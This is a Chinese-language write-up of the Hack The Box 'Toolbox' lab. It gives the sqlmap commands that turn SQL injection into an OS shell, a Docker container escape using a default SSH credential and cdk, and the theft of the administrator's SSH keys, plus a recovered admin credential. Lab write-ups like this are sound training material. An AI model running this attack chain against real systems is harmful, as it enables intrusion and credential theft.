HTB Toolbox

0x01 端口扫描

443web、21ftp匿名访问、22ssh(win7)
443证书暴露了域信息：admin.megalogistic.com

echo "10.129.96.171 admin.megalogistic.com" >> /etc/hosts
tail -n 1 /etc/hosts

0x02 ftp

匿名登录后只有一个docker-toolbox.exe

对该exe的研究暂时延后

0x03 smb

smbclient -N -L //10.129.96.171

0x04 web

#强制https
sqlmap -r sql.txt --force-ssl

admin@iamzeadmin

本身也能万能密码进后台，所以用处不大，尝试写马：

sqlmap -r sql.txt --force-ssl --os-cmd id --flush-session --batch

写马过程最好交给–batch，自己一个没选对就要报错：unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported

可以通，且判断为linux，显然是在docker中，换os-shell反弹shell

sqlmap -r sql.txt --force-ssl --os-shell --batch

0x05 提权

python3 -c 'import pty;pty.spawn("/bin/bash")' 
export TERM=xterm-color

经典的docker ip，宿主机大概率就是172.17.0.2，传fscan探测：

fscan -h 172.17.0.1 -o 1.txt

web页面和入口点的一样，唯一突破点在ssh

似乎存在默认凭据，去官网查看

确实是，docker@tcuser
本来是让正常用户的windows主机去使用管理toolbox的，但是这里能被我们的docker机访问到

至此移动到了toolbox宿主机，还需要进一步移动到真正的windows宿主机，到了docker逃逸环节，上cdk：

./cdk eva --full

看到了挂载了的c:\users\administrator下面有ssh的公私钥，验证后下载下来直接连接

ssh-keygen -y -e -f id_rsa
ssh-keygen -y -e -f id_rsa.pub

ssh-keygen -y -e -f <file> 将返回密钥的公钥，因此可以使用它来检查私钥是否与公钥匹配